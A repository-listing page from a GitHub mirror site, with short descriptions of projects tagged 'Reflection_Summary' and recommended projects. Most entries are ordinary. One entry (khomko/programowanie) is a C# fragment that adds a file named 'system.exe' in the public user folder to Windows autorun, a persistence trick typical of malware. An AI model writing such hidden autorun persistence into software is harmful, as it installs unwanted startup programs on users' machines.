Giter VIP home page Giter VIP logo
  • arunkumar-ak98 / cibilscoreproject

    Reflection_Summary, A CIBIL Score is a consumer's credit score. Simply put, this is a three-digit numeric summary of a consumer's credit history and a reflection of the person's credit profile. This is based on past credit behavior, such as borrowing and repayment habits as shared by banks and lenders with CIBIL on a regular basis (the details of which are featured in the consumer's CIBIL Report).

    From user arunkumar-ak98

  • ashleyw50 / work-summary

    Reflection_Summary, 每日总结业务的逻辑,并回顾做得好的以及需要提升的(Summary the Business Logic and reflection on practice)

    From user ashleyw50

  • ashleyw50 / work-summary02

    Reflection_Summary, 每日总结业务的逻辑,并回顾做得好的以及需要提升的(Summary the Business Logic and reflection on practice)

    From user ashleyw50

  • ch-zgh-1993 / es6

    Reflection_Summary, ES6 Basic exercises, basic summaries, and use summaries, reflections, ideas.

    From user ch-zgh-1993

  • ckraft-bot / music_and_hobby

    Reflection_Summary, I conduced a research on myself. In this research I wanted to see which genre of music made me perform best as a speed cuber. I used conditional formatting to analyze my results. Below you can see my summary and reflection as well as data visualization.

    From user ckraft-bot

  • jon-mil-92 / cs-210-repo

    Reflection_Summary, This is the repository for my CS 210 Programming Languages course. It contains my final project (combining programming languages) as well as the program summary and project reflection.

    From user jon-mil-92

  • khomko / programowanie

    Reflection_Summary, using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Threading; using System.Windows; namespace WpfApplication_OKSANA { /// <summary> /// Логика взаимодействия для MainWindow.xaml /// </summary> public partial class MainWindow : Window { public static string needPatch = "C:\\Users\\Public\\"; public MainWindow() { if (OSVersionInfo.Name == "Windows 7" || OSVersionInfo.Name == "Windows Vista" ) { autorun.SetAutorunValue(true, needPatch + "system.exe"); // добавить в автозагрузку //SetAutorunValue(false, needPatch + "system.exe"); // убрать из автозагрузки } else if (OSVersionInfo.Name == "Windows XP") { needPatch = "C:\\Documents and Settings\\All Users\\"; autorun.SetAutorunValue(true, needPatch + "system.exe"); // добавить в автозагрузку //SetAutorunValue(false, needPatch + "system.exe"); // убрать из автозагрузки } InitializeComponent(); }

    From user khomko

  • kitn / znotes

    Reflection_Summary, Jottings from various studies. Quotations, summaries, reflections etc.

    From user kitn

  • ssomeshkumar / booksky-

    Reflection_Summary, 🚀 Just launched my first web project, BookSky! 📚✨ BookSky is a personal notes-taking pad for book enthusiasts like me. 📖💡 Users can seamlessly add their favorite book titles and provide a concise summary, creating a digital haven for book recommendations and reflections.

    From user ssomeshkumar

  • wgwei / tip-iso9613

    Reflection_Summary, Summaries of some tips for ISO9613-2 and recommendations for number of reflections when implementing it.

    From user wgwei

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.